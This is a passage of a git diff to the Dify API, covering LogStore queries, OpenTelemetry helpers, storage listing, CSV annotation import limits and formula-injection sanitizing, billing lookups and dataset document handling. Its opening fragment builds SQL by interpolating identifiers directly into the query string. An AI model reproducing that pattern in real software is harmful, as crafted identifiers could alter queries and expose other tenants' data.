workflow_run_id='{workflow_run_id}' + AND tenant_id='{self._tenant_id}' + AND finished_at IS NOT NULL + """ + + if self._app_id: + sql += f" AND app_id='{self._app_id}'" + + if order_clause: + sql += f" {order_clause}" + + try: + # Execute SQL query + results = self.logstore_client.execute_sql( + sql=sql, + query="*", + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + + # Convert LogStore results to WorkflowNodeExecution domain models + executions = [] + for row in results: + try: + execution = _dict_to_workflow_node_execution(row) + executions.append(execution) + except Exception as e: + logger.warning("Failed to convert row to WorkflowNodeExecution: %s, row=%s", e, row) + continue + + return executions + + except Exception: + logger.exception("Failed to retrieve node executions from LogStore: workflow_run_id=%s", workflow_run_id) + raise diff --git a/api/extensions/otel/decorators/base.py b/api/extensions/otel/decorators/base.py index 9604a3b6d5..14221d24dd 100644 --- a/api/extensions/otel/decorators/base.py +++ b/api/extensions/otel/decorators/base.py @@ -1,5 +1,4 @@ import functools -import os from collections.abc import Callable from typing import Any, TypeVar, cast @@ -7,22 +6,13 @@ from opentelemetry.trace import get_tracer from configs import dify_config from extensions.otel.decorators.handler import SpanHandler +from extensions.otel.runtime import is_instrument_flag_enabled T = TypeVar("T", bound=Callable[..., Any]) _HANDLER_INSTANCES: dict[type[SpanHandler], SpanHandler] = {SpanHandler: SpanHandler()} -def _is_instrument_flag_enabled() -> bool: - """ - Check if external instrumentation is enabled via environment variable. - - Third-party non-invasive instrumentation agents set this flag to coordinate - with Dify's manual OpenTelemetry instrumentation. - """ - return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" - - def _get_handler_instance(handler_class: type[SpanHandler]) -> SpanHandler: """Get or create a singleton instance of the handler class.""" if handler_class not in _HANDLER_INSTANCES: @@ -43,7 +33,7 @@ def trace_span(handler_class: type[SpanHandler] | None = None) -> Callable[[T], def decorator(func: T) -> T: @functools.wraps(func) def wrapper(*args: Any, **kwargs: Any) -> Any: - if not (dify_config.ENABLE_OTEL or _is_instrument_flag_enabled()): + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): return func(*args, **kwargs) handler = _get_handler_instance(handler_class or SpanHandler) diff --git a/api/extensions/otel/runtime.py b/api/extensions/otel/runtime.py index 16f5ccf488..a7181d2683 100644 --- a/api/extensions/otel/runtime.py +++ b/api/extensions/otel/runtime.py @@ -1,4 +1,5 @@ import logging +import os import sys from typing import Union @@ -71,3 +72,13 @@ def init_celery_worker(*args, **kwargs): if dify_config.DEBUG: logger.info("Initializing OpenTelemetry for Celery worker") CeleryInstrumentor(tracer_provider=tracer_provider, meter_provider=metric_provider).instrument() + + +def is_instrument_flag_enabled() -> bool: + """ + Check if external instrumentation is enabled via environment variable. + + Third-party non-invasive instrumentation agents set this flag to coordinate + with Dify's manual OpenTelemetry instrumentation. + """ + return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" diff --git a/api/extensions/storage/opendal_storage.py b/api/extensions/storage/opendal_storage.py index a084844d72..83c5c2d12f 100644 --- a/api/extensions/storage/opendal_storage.py +++ b/api/extensions/storage/opendal_storage.py @@ -87,15 +87,16 @@ class OpenDALStorage(BaseStorage): if not self.exists(path): raise FileNotFoundError("Path not found") - all_files = self.op.scan(path=path) + # Use the new OpenDAL 0.46.0+ API with recursive listing + lister = self.op.list(path, recursive=True) if files and directories: logger.debug("files and directories on %s scanned", path) - return [f.path for f in all_files] + return [entry.path for entry in lister] if files: logger.debug("files on %s scanned", path) - return [f.path for f in all_files if not f.path.endswith("/")] + return [entry.path for entry in lister if not entry.metadata.is_dir] elif directories: logger.debug("directories on %s scanned", path) - return [f.path for f in all_files if f.path.endswith("/")] + return [entry.path for entry in lister if entry.metadata.is_dir] else: raise ValueError("At least one of files or directories must be True") diff --git a/api/factories/file_factory.py b/api/factories/file_factory.py index 737a79f2b0..bd71f18af2 100644 --- a/api/factories/file_factory.py +++ b/api/factories/file_factory.py @@ -1,3 +1,4 @@ +import logging import mimetypes import os import re @@ -17,6 +18,8 @@ from core.helper import ssrf_proxy from extensions.ext_database import db from models import MessageFile, ToolFile, UploadFile +logger = logging.getLogger(__name__) + def build_from_message_files( *, @@ -356,15 +359,20 @@ def _build_from_tool_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + # Backward/interop compatibility: allow tool_file_id to come from related_id or URL + tool_file_id = mapping.get("tool_file_id") + + if not tool_file_id: + raise ValueError(f"ToolFile {tool_file_id} not found") tool_file = db.session.scalar( select(ToolFile).where( - ToolFile.id == mapping.get("tool_file_id"), + ToolFile.id == tool_file_id, ToolFile.tenant_id == tenant_id, ) ) if tool_file is None: - raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found") + raise ValueError(f"ToolFile {tool_file_id} not found") extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin" @@ -402,10 +410,13 @@ def _build_from_datasource_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + datasource_file_id = mapping.get("datasource_file_id") + if not datasource_file_id: + raise ValueError(f"DatasourceFile {datasource_file_id} not found") datasource_file = ( db.session.query(UploadFile) .where( - UploadFile.id == mapping.get("datasource_file_id"), + UploadFile.id == datasource_file_id, UploadFile.tenant_id == tenant_id, ) .first() diff --git a/api/libs/encryption.py b/api/libs/encryption.py new file mode 100644 index 0000000000..81be8cce97 --- /dev/null +++ b/api/libs/encryption.py @@ -0,0 +1,66 @@ +""" +Field Encoding/Decoding Utilities + +Provides Base64 decoding for sensitive fields (password, verification code) +received from the frontend. + +Note: This uses Base64 encoding for obfuscation, not cryptographic encryption. +Real security relies on HTTPS for transport layer encryption. +""" + +import base64 +import logging + +logger = logging.getLogger(__name__) + + +class FieldEncryption: + """Handle decoding of sensitive fields during transmission""" + + @classmethod + def decrypt_field(cls, encoded_text: str) -> str | None: + """ + Decode Base64 encoded field from frontend. + + Args: + encoded_text: Base64 encoded text from frontend + + Returns: + Decoded plaintext, or None if decoding fails + """ + try: + # Decode base64 + decoded_bytes = base64.b64decode(encoded_text) + decoded_text = decoded_bytes.decode("utf-8") + logger.debug("Field decoding successful") + return decoded_text + + except Exception: + # Decoding failed - return None to trigger error in caller + return None + + @classmethod + def decrypt_password(cls, encrypted_password: str) -> str | None: + """ + Decrypt password field + + Args: + encrypted_password: Encrypted password from frontend + + Returns: + Decrypted password or None if decryption fails + """ + return cls.decrypt_field(encrypted_password) + + @classmethod + def decrypt_verification_code(cls, encrypted_code: str) -> str | None: + """ + Decrypt verification code field + + Args: + encrypted_code: Encrypted code from frontend + + Returns: + Decrypted code or None if decryption fails + """ + return cls.decrypt_field(encrypted_code) diff --git a/api/libs/helper.py b/api/libs/helper.py index a278ace6ad..74e1808e49 100644 --- a/api/libs/helper.py +++ b/api/libs/helper.py @@ -11,6 +11,7 @@ from collections.abc import Generator, Mapping from datetime import datetime from hashlib import sha256 from typing import TYPE_CHECKING, Annotated, Any, Optional, Union, cast +from uuid import UUID from zoneinfo import available_timezones from flask import Response, stream_with_context @@ -119,6 +120,19 @@ def uuid_value(value: Any) -> str: raise ValueError(error) +def normalize_uuid(value: str | UUID) -> str: + if not value: + return "" + + try: + return uuid_value(value) + except ValueError as exc: + raise ValueError("must be a valid UUID") from exc + + +UUIDStrOrEmpty = Annotated[str, AfterValidator(normalize_uuid)] + + def alphanumeric(value: str): # check if the value is alphanumeric and underlined if re.match(r"^[a-zA-Z0-9_]+$", value): @@ -184,7 +198,7 @@ def timezone(timezone_string): def convert_datetime_to_date(field, target_timezone: str = ":tz"): if dify_config.DB_TYPE == "postgresql": return f"DATE(DATE_TRUNC('day', {field} AT TIME ZONE 'UTC' AT TIME ZONE {target_timezone}))" - elif dify_config.DB_TYPE == "mysql": + elif dify_config.DB_TYPE in ["mysql", "oceanbase", "seekdb"]: return f"DATE(CONVERT_TZ({field}, 'UTC', {target_timezone}))" else: raise NotImplementedError(f"Unsupported database type: {dify_config.DB_TYPE}") @@ -215,7 +229,11 @@ def generate_text_hash(text: str) -> str: def compact_generate_response(response: Union[Mapping, Generator, RateLimitGenerator]) -> Response: if isinstance(response, dict): - return Response(response=json.dumps(jsonable_encoder(response)), status=200, mimetype="application/json") + return Response( + response=json.dumps(jsonable_encoder(response)), + status=200, + content_type="application/json; charset=utf-8", + ) else: def generate() -> Generator: diff --git a/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py new file mode 100644 index 0000000000..2bdd430e81 --- /dev/null +++ b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py @@ -0,0 +1,31 @@ +"""add type column not null default tool + +Revision ID: 03ea244985ce +Revises: d57accd375ae +Create Date: 2025-12-16 18:17:12.193877 + +""" +from alembic import op +import models as models +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + +# revision identifiers, used by Alembic. +revision = '03ea244985ce' +down_revision = 'd57accd375ae' +branch_labels = None +depends_on = None + + +def upgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.add_column(sa.Column('type', sa.String(length=50), server_default=sa.text("'tool'"), nullable=False)) + # ### end Alembic commands ### + + +def downgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.drop_column('type') + # ### end Alembic commands ### diff --git a/api/models/dataset.py b/api/models/dataset.py index ba2eaf6749..445ac6086f 100644 --- a/api/models/dataset.py +++ b/api/models/dataset.py @@ -1532,6 +1532,7 @@ class PipelineRecommendedPlugin(TypeBase): ) plugin_id: Mapped[str] = mapped_column(LongText, nullable=False) provider_name: Mapped[str] = mapped_column(LongText, nullable=False) + type: Mapped[str] = mapped_column(sa.String(50), nullable=False, server_default=sa.text("'tool'")) position: Mapped[int] = mapped_column(sa.Integer, nullable=False, default=0) active: Mapped[bool] = mapped_column(sa.Boolean, nullable=False, default=True) created_at: Mapped[datetime] = mapped_column( diff --git a/api/models/model.py b/api/models/model.py index c8fbdc40ec..88cb945b3f 100644 --- a/api/models/model.py +++ b/api/models/model.py @@ -111,7 +111,11 @@ class App(Base): else: app_model_config = self.app_model_config if app_model_config: - return app_model_config.pre_prompt + pre_prompt = app_model_config.pre_prompt or "" + # Truncate to 200 characters with ellipsis if using prompt as description + if len(pre_prompt) > 200: + return pre_prompt[:200] + "..." + return pre_prompt else: return "" diff --git a/api/pyproject.toml b/api/pyproject.toml index 2a8432f571..870de33f4b 100644 --- a/api/pyproject.toml +++ b/api/pyproject.toml @@ -1,9 +1,10 @@ [project] name = "dify-api" -version = "1.11.0" +version = "1.11.1" requires-python = ">=3.11,<3.13" dependencies = [ + "aliyun-log-python-sdk~=0.9.37", "arize-phoenix-otel~=0.9.2", "azure-identity==1.16.1", "beautifulsoup4==4.12.2", @@ -31,6 +32,7 @@ dependencies = [ "httpx[socks]~=0.27.0", "jieba==0.42.1", "json-repair>=0.41.1", + "jsonschema>=4.25.1", "langfuse~=2.51.3", "langsmith~=0.1.77", "markdown~=3.5.1", @@ -91,7 +93,6 @@ dependencies = [ "weaviate-client==4.17.0", "apscheduler>=3.11.0", "weave>=0.52.16", - "jsonschema>=4.25.1", ] # Before adding new dependency, consider place it in # alphabet order (a-z) and suitable group. @@ -216,6 +217,7 @@ vdb = [ "pymochow==2.2.9", "pyobvector~=0.2.17", "qdrant-client==1.9.0", + "intersystems-irispython>=5.1.0", "tablestore==6.3.7", "tcvectordb~=1.6.4", "tidb-vector==0.0.9", diff --git a/api/pytest.ini b/api/pytest.ini index afb53b47cc..4a9470fa0c 100644 --- a/api/pytest.ini +++ b/api/pytest.ini @@ -1,5 +1,5 @@ [pytest] -addopts = --cov=./api --cov-report=json --cov-report=xml +addopts = --cov=./api --cov-report=json env = ANTHROPIC_API_KEY = sk-ant-api11-IamNotARealKeyJustForMockTestKawaiiiiiiiiii-NotBaka-ASkksz AZURE_OPENAI_API_BASE = https://difyai-openai.openai.azure.com diff --git a/api/services/annotation_service.py b/api/services/annotation_service.py index 9258def907..d03cbddceb 100644 --- a/api/services/annotation_service.py +++ b/api/services/annotation_service.py @@ -1,10 +1,14 @@ +import logging import uuid import pandas as pd + +logger = logging.getLogger(__name__) from sqlalchemy import or_, select from werkzeug.datastructures import FileStorage from werkzeug.exceptions import NotFound +from core.helper.csv_sanitizer import CSVSanitizer from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -155,6 +159,12 @@ class AppAnnotationService: @classmethod def export_annotation_list_by_app_id(cls, app_id: str): + """ + Export all annotations for an app with CSV injection protection. + + Sanitizes question and content fields to prevent formula injection attacks + when exported to CSV format. + """ # get app info _, current_tenant_id = current_account_with_tenant() app = ( @@ -171,6 +181,16 @@ class AppAnnotationService: .order_by(MessageAnnotation.created_at.desc()) .all() ) + + # Sanitize CSV-injectable fields to prevent formula injection + for annotation in annotations: + # Sanitize question field if present + if annotation.question: + annotation.question = CSVSanitizer.sanitize_value(annotation.question) + # Sanitize content field (answer) + if annotation.content: + annotation.content = CSVSanitizer.sanitize_value(annotation.content) + return annotations @classmethod @@ -330,6 +350,18 @@ class AppAnnotationService: @classmethod def batch_import_app_annotations(cls, app_id, file: FileStorage): + """ + Batch import annotations from CSV file with enhanced security checks. + + Security features: + - File size validation + - Row count limits (min/max) + - Memory-efficient CSV parsing + - Subscription quota validation + - Concurrency tracking + """ + from configs import dify_config + # get app info current_user, current_tenant_id = current_account_with_tenant() app = ( @@ -341,16 +373,80 @@ class AppAnnotationService: if not app: raise NotFound("App not found") + job_id: str | None = None # Initialize to avoid unbound variable error try: - # Skip the first row - df = pd.read_csv(file.stream, dtype=str) - result = [] - for _, row in df.iterrows(): - content = {"question": row.iloc[0], "answer": row.iloc[1]} + # Quick row count check before full parsing (memory efficient) + # Read only first chunk to estimate row count + file.stream.seek(0) + first_chunk = file.stream.read(8192) # Read first 8KB + file.stream.seek(0) + + # Estimate row count from first chunk + newline_count = first_chunk.count(b"\n") + if newline_count == 0: + raise ValueError("The CSV file appears to be empty or invalid.") + + # Parse CSV with row limit to prevent memory exhaustion + # Use chunksize for memory-efficient processing + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + min_records = dify_config.ANNOTATION_IMPORT_MIN_RECORDS + + # Read CSV in chunks to avoid loading entire file into memory + df = pd.read_csv( + file.stream, + dtype=str, + nrows=max_records + 1, # Read one extra to detect overflow + engine="python", + on_bad_lines="skip", # Skip malformed lines instead of crashing + ) + + # Validate column count + if len(df.columns) < 2: + raise ValueError("Invalid CSV format. The file must contain at least 2 columns (question and answer).") + + # Build result list with validation + result: list[dict] = [] + for idx, row in df.iterrows(): + # Stop if we exceed the limit + if len(result) >= max_records: + raise ValueError( + f"The CSV file contains too many records. Maximum {max_records} records allowed per import. " + f"Please split your file into smaller batches." + ) + + # Extract and validate question and answer + try: + question_raw = row.iloc[0] + answer_raw = row.iloc[1] + except (IndexError, KeyError): + continue # Skip malformed rows + + # Convert to string and strip whitespace + question = str(question_raw).strip() if question_raw is not None else "" + answer = str(answer_raw).strip() if answer_raw is not None else "" + + # Skip empty entries or NaN values + if not question or not answer or question.lower() == "nan" or answer.lower() == "nan": + continue + + # Validate length constraints (idx is pandas index, convert to int for display) + row_num = int(idx) + 2 if isinstance(idx, (int, float)) else len(result) + 2 + if len(question) > 2000: + raise ValueError(f"Question at row {row_num} is too long. Maximum 2000 characters allowed.") + if len(answer) > 10000: + raise ValueError(f"Answer at row {row_num} is too long. Maximum 10000 characters allowed.") + + content = {"question": question, "answer": answer} result.append(content) - if len(result) == 0: - raise ValueError("The CSV file is empty.") - # check annotation limit + + # Validate minimum records + if len(result) < min_records: + raise ValueError( + f"The CSV file must contain at least {min_records} valid annotation record(s). " + f"Found {len(result)} valid record(s)." + ) + + # Check annotation quota limit features = FeatureService.get_features(current_tenant_id) if features.billing.enabled: annotation_quota_limit = features.annotation_quota_limit @@ -359,12 +455,34 @@ class AppAnnotationService: # async job job_id = str(uuid.uuid4()) indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" - # send batch add segments task + + # Register job in active tasks list for concurrency tracking + current_time = int(naive_utc_now().timestamp() * 1000) + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zadd(active_jobs_key, {job_id: current_time}) + redis_client.expire(active_jobs_key, 7200) # 2 hours TTL + + # Set job status redis_client.setnx(indexing_cache_key, "waiting") batch_import_annotations_task.delay(str(job_id), result, app_id, current_tenant_id, current_user.id) - except Exception as e: + + except ValueError as e: return {"error_msg": str(e)} - return {"job_id": job_id, "job_status": "waiting"} + except Exception as e: + # Clean up active job registration on error (only if job was created) + if job_id is not None: + try: + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zrem(active_jobs_key, job_id) + except Exception: + # Silently ignore cleanup errors - the job will be auto-expired + logger.debug("Failed to clean up active job tracking during error handling") + + # Check if it's a CSV parsing error + error_str = str(e) + return {"error_msg": f"An error occurred while processing the file: {error_str}"} + + return {"job_id": job_id, "job_status": "waiting", "record_count": len(result)} @classmethod def get_annotation_hit_histories(cls, app_id: str, annotation_id: str, page, limit): diff --git a/api/services/billing_service.py b/api/services/billing_service.py index 54e1c9d285..3d7cb6cc8d 100644 --- a/api/services/billing_service.py +++ b/api/services/billing_service.py @@ -1,8 +1,12 @@ +import logging import os +from collections.abc import Sequence from typing import Literal import httpx +from pydantic import TypeAdapter from tenacity import retry, retry_if_exception_type, stop_before_delay, wait_fixed +from typing_extensions import TypedDict from werkzeug.exceptions import InternalServerError from enums.cloud_plan import CloudPlan @@ -11,6 +15,15 @@ from extensions.ext_redis import redis_client from libs.helper import RateLimiter from models import Account, TenantAccountJoin, TenantAccountRole +logger = logging.getLogger(__name__) + + +class SubscriptionPlan(TypedDict): + """Tenant subscriptionplan information.""" + + plan: str + expiration_date: int + class BillingService: base_url = os.environ.get("BILLING_API_URL", "BILLING_API_URL") @@ -239,3 +252,39 @@ class BillingService: def sync_partner_tenants_bindings(cls, account_id: str, partner_key: str, click_id: str): payload = {"account_id": account_id, "click_id": click_id} return cls._send_request("PUT", f"/partners/{partner_key}/tenants", json=payload) + + @classmethod + def get_plan_bulk(cls, tenant_ids: Sequence[str]) -> dict[str, SubscriptionPlan]: + """ + Bulk fetch billing subscription plan via billing API. + Payload: {"tenant_ids": ["t1", "t2", ...]} (max 200 per request) + Returns: + Mapping of tenant_id -> {plan: str, expiration_date: int} + """ + results: dict[str, SubscriptionPlan] = {} + subscription_adapter = TypeAdapter(SubscriptionPlan) + + chunk_size = 200 + for i in range(0, len(tenant_ids), chunk_size): + chunk = tenant_ids[i : i + chunk_size] + try: + resp = cls._send_request("POST", "/subscription/plan/batch", json={"tenant_ids": chunk}) + data = resp.get("data", {}) + + for tenant_id, plan in data.items(): + subscription_plan = subscription_adapter.validate_python(plan) + results[tenant_id] = subscription_plan + except Exception: + logger.exception("Failed to fetch billing info batch for tenants: %s", chunk) + continue + + return results + + @classmethod + def get_expired_subscription_cleanup_whitelist(cls) -> Sequence[str]: + resp = cls._send_request("GET", "/subscription/cleanup/whitelist") + data = resp.get("data", []) + tenant_whitelist = [] + for item in data: + tenant_whitelist.append(item["tenant_id"]) + return tenant_whitelist diff --git a/api/services/dataset_service.py b/api/services/dataset_service.py index 7841b8b33d..970192fde5 100644 --- a/api/services/dataset_service.py +++ b/api/services/dataset_service.py @@ -1419,7 +1419,7 @@ class DocumentService: document.name = name db.session.add(document) - if document.data_source_info_dict: + if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict: db.session.query(UploadFile).where( UploadFile.id == document.data_source_info_dict["upload_file_id"] ).update({UploadFile.name: name}) @@ -1636,6 +1636,20 @@ class DocumentService: return [], "" db.session.add(dataset_process_rule) db.session.flush() + else: + # Fallback when no process_rule provided in knowledge_config: + # 1) reuse dataset.latest_process_rule if present + # 2) otherwise create an automatic rule + dataset_process_rule = getattr(dataset, "latest_process_rule", None) + if not dataset_process_rule: + dataset_process_rule = DatasetProcessRule( + dataset_id=dataset.id, + mode="automatic", + rules=json.dumps(DatasetProcessRule.AUTOMATIC_RULES), + created_by=account.id, + ) + db.session.add(dataset_process_rule) + db.session.flush() lock_name = f"add_document_lock_dataset_id_{dataset.id}" try: with redis_client.lock(lock_name, timeout=600): @@ -1647,65 +1661,67 @@ class DocumentService: if not knowledge_config.data_source.info_list.file_info_list: raise ValueError("File source info is required") upload_file_list = knowledge_config.data_source.info_list.file_info_list.file_ids - for file_id in upload_file_list: - file = ( - db.session.query(UploadFile) - .where(UploadFile.tenant_id == dataset.tenant_id, UploadFile.id == file_id) - .first() + files = ( + db.session.query(UploadFile) + .where( + UploadFile.tenant_id == dataset.tenant_id, + UploadFile.id.in_(upload_file_list), ) + .all() + ) + if len(files) != len(set(upload_file_list)): + raise FileNotExistsError("One or more files not found.") - # raise error if file not found - if not file: - raise FileNotExistsError() - - file_name = file.name + file_names = [file.name for file in files] + db_documents = ( + db.session.query(Document) + .where( + Document.dataset_id == dataset.id, + Document.tenant_id == current_user.current_tenant_id, + Document.data_source_type == "upload_file", + Document.enabled == True, + Document.name.in_(file_names), + ) + .all() + ) + documents_map = {document.name: document for document in db_documents} + for file in files: data_source_info: dict[str, str | bool] = { - "upload_file_id": file_id, + "upload_file_id": file.id, } - # check duplicate - if knowledge_config.duplicate: - document = ( - db.session.query(Document) - .filter_by( - dataset_id=dataset.id, - tenant_id=current_user.current_tenant_id, - data_source_type="upload_file", - enabled=True, - name=file_name, - ) - .first() + document = documents_map.get(file.name) + if knowledge_config.duplicate and document: + document.dataset_process_rule_id = dataset_process_rule.id + document.updated_at = naive_utc_now() + document.created_from = created_from + document.doc_form = knowledge_config.doc_form + document.doc_language = knowledge_config.doc_language + document.data_source_info = json.dumps(data_source_info) + document.batch = batch + document.indexing_status = "waiting" + db.session.add(document) + documents.append(document) + duplicate_document_ids.append(document.id) + continue + else: + document = DocumentService.build_document( + dataset, + dataset_process_rule.id, + knowledge_config.data_source.info_list.data_source_type, + knowledge_config.doc_form, + knowledge_config.doc_language, + data_source_info, + created_from, + position, + account, + file.name, + batch, ) - if document: - document.dataset_process_rule_id = dataset_process_rule.id - document.updated_at = naive_utc_now() - document.created_from = created_from - document.doc_form = knowledge_config.doc_form - document.doc_language = knowledge_config.doc_language - document.data_source_info = json.dumps(data_source_info) - document.batch = batch - document.indexing_status = "waiting" - db.session.add(document) - documents.append(document) - duplicate_document_ids.append(document.id) - continue - document = DocumentService.build_document( - dataset, - dataset_process_rule.id, - knowledge_config.data_source.info_list.data_source_type, - knowledge_config.doc_form, - knowledge_config.doc_language, - data_source_info, - created_from, - position, - account, - file_name, - batch, - ) - db.session.add(document) - db.session.flush() - document_ids.append(document.id) - documents.append(document) - position += 1 + db.session.add(document) + db.session.flush() + document_ids.append(document.id) + documents.append(document) + position += 1 elif knowledge_config.data_source.info_list.data_source_type == "notion_import": notion_info_list = knowledge_config.data_source.info_list.notion_info_list # type: ignore if not notion_info_list: @@ -2801,20 +2817,20 @@ class SegmentService: db.session.add(binding) db.session.commit() - # save vector index - try: - VectorService.create_segments_vector( - [args["keywords"]], [segment_document], dataset, document.doc_form - ) - except Exception as e: - logger.exception("create segment index failed") - segment_document.enabled = False - segment_document.disabled_at = naive_utc_now() - segment_document.status = "error" - segment_document.error = str(e) - db.session.commit() - segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() - return segment + # save vector index + try: + keywords = args.get("keywords") + keywords_list = [keywords] if keywords is not None else None + VectorService.create_segments_vector(keywords_list, [segment_document], dataset, document.doc_form) + except Exception as e: + logger.exception("create segment index failed") + segment_document.enabled = False + segment_document.disabled_at = naive_utc_now() + segment_document.status = "error" + segment_document.error = str(e) + db.session.commit() + segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() + return segment except LockNotOwnedError: pass diff --git a/api/services/entities/knowledge_entities/rag_pipeline_entities.py b/api/services/entities/knowledge_entities/rag_pipeline_entities.py index a97ccab914..cbb0efcc2a 100644 --- a/api/services/entities/knowledge_entities/rag_pipeline_entities.py +++ b/api/services/entities/knowledge_entities/rag_pipeline_entities.py @@ -23,7 +23,7 @@ class RagPipelineDatasetCreateEntity(BaseModel): description: str icon_info: IconInfo permission: str - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None yaml_content: str | None = None diff --git a/api/services/hit_testing_service.py b/api/services/hit_testing_service.py index 8e8e78f83f..8cbf3a25c3 100644 --- a/api/services/hit_testing_service.py +++ b/api/services/hit_testing_service.py @@ -178,8 +178,8 @@ class HitTestingService: @classmethod def hit_testing_args_check(cls, args): - query = args["query"] - attachment_ids = args["attachment_ids"] + query = args.get("query") + attachment_ids = args.get("attachment_ids") if not attachment_ids and not query: raise ValueError("Query or attachment_ids is required") diff --git a/api/services/rag_pipeline/rag_pipeline.py b/api/services/rag_pipeline/rag_pipeline.py index 097d16e2a7..f53448e7fe 100644 --- a/api/services/rag_pipeline/rag_pipeline.py +++ b/api/services/rag_pipeline/rag_pipeline.py @@ -1248,14 +1248,13 @@ class RagPipelineService: session.commit() return workflow_node_execution_db_model - def get_recommended_plugins(self) -> dict: + def get_recommended_plugins(self, type: str) -> dict: # Query active recommended plugins - pipeline_recommended_plugins = ( - db.session.query(PipelineRecommendedPlugin) - .where(PipelineRecommendedPlugin.active == True) - .order_by(PipelineRecommendedPlugin.position.asc()) - .all() - ) + query = db.session.query(PipelineRecommendedPlugin).where(PipelineRecommendedPlugin.active == True) + if type and type != "all": + query = query.where(PipelineRecommendedPlugin.type == type) + + pipeline_recommended_plugins = query.order_by(PipelineRecommendedPlugin.position.asc()).all() if not pipeline_recommended_plugins: return { diff --git a/api/services/trigger/webhook_service.py b/api/services/trigger/webhook_service.py index 4b3e1330fd..5c4607d400 100644 --- a/api/services/trigger/webhook_service.py +++ b/api/services/trigger/webhook_service.py @@ -33,6 +33,11 @@ from services.errors.app import QuotaExceededError from services.trigger.app_trigger_service import AppTriggerService from services.workflow.entities import WebhookTriggerData +try: + import magic +except ImportError: + magic = None # type: ignore[assignment] + logger = logging.getLogger(__name__) @@ -317,7 +322,8 @@ class WebhookService: try: file_content = request.get_data() if file_content: - file_obj = cls._create_file_from_binary(file_content, "application/octet-stream", webhook_trigger) + mimetype = cls._detect_binary_mimetype(file_content) + file_obj = cls._create_file_from_binary(file_content, mimetype, webhook_trigger) return {"raw": file_obj.to_dict()}, {} else: return {"raw": None}, {} @@ -341,6 +347,18 @@ class WebhookService: body = {"raw": ""} return body, {} + @staticmethod + def _detect_binary_mimetype(file_content: bytes) -> str: + """Guess MIME type for binary payloads using python-magic when available.""" + if magic is not None: + try: + detected = magic.from_buffer(file_content[:1024], mime=True) + if detected: + return detected + except Exception: + logger.debug("python-magic detection failed for octet-stream payload") + return "application/octet-stream" + @classmethod def _process_file_uploads( cls, files: Mapping[str, FileStorage], webhook_trigger: WorkflowWebhookTrigger diff --git a/api/services/variable_truncator.py b/api/services/variable_truncator.py index 6eb8d0031d..0f969207cf 100644 --- a/api/services/variable_truncator.py +++ b/api/services/variable_truncator.py @@ -410,9 +410,12 @@ class VariableTruncator(BaseTruncator): @overload def _truncate_json_primitives(self, val: None, target_size: int) -> _PartResult[None]: ... + @overload + def _truncate_json_primitives(self, val: File, target_size: int) -> _PartResult[File]: ... + def _truncate_json_primitives( self, - val: UpdatedVariable | str | list[object] | dict[str, object] | bool | int | float | None, + val: UpdatedVariable | File | str | list[object] | dict[str, object] | bool | int | float | None, target_size: int, ) -> _PartResult[Any]: """Truncate a value within an object to fit within budget.""" @@ -425,6 +428,9 @@ class VariableTruncator(BaseTruncator): return self._truncate_array(val, target_size) elif isinstance(val, dict): return self._truncate_object(val, target_size) + elif isinstance(val, File): + # File objects should not be truncated, return as-is + return _PartResult(val, self.calculate_json_size(val), False) elif val is None or isinstance(val, (bool, int, float)): return _PartResult(val, self.calculate_json_size(val), False) else: diff --git a/api/tasks/annotation/batch_import_annotations_task.py b/api/tasks/annotation/batch_import_annotations_task.py index 8e46e8d0e3..775814318b 100644 --- a/api/tasks/annotation/batch_import_annotations_task.py +++ b/api/tasks/annotation/batch_import_annotations_task.py @@ -30,6 +30,8 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: logger.info(click.style(f"Start batch import annotation: {job_id}", fg="green")) start_at = time.perf_counter() indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" + active_jobs_key = f"annotation_import_active:{tenant_id}" + # get app info app = db.session.query(App).where(App.id == app_id, App.tenant_id == tenant_id, App.status == "normal").first() @@ -91,4 +93,13 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: redis_client.setex(indexing_error_msg_key, 600, str(e)) logger.exception("Build index for batch import annotations failed") finally: + # Clean up active job tracking to release concurrency slot + try: + redis_client.zrem(active_jobs_key, job_id) + logger.debug("Released concurrency slot for job: %s", job_id) + except Exception as cleanup_error: + # Log but don't fail if cleanup fails - the job will be auto-expired + logger.warning("Failed to clean up active job tracking for %s: %s", job_id, cleanup_error) + + # Close database session db.session.close() diff --git a/api/tasks/clean_dataset_task.py b/api/tasks/clean_dataset_task.py index 8608df6b8e..b4d82a150d 100644 --- a/api/tasks/clean_dataset_task.py +++ b/api/tasks/clean_dataset_task.py @@ -9,6 +9,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto from core.tools.utils.web_reader_tool import get_image_upload_file_ids from extensions.ext_database import db from extensions.ext_storage import storage +from models import WorkflowType from models.dataset import ( AppDatasetJoin, Dataset, @@ -18,9 +19,11 @@ from models.dataset import ( DatasetQuery, Document, DocumentSegment, 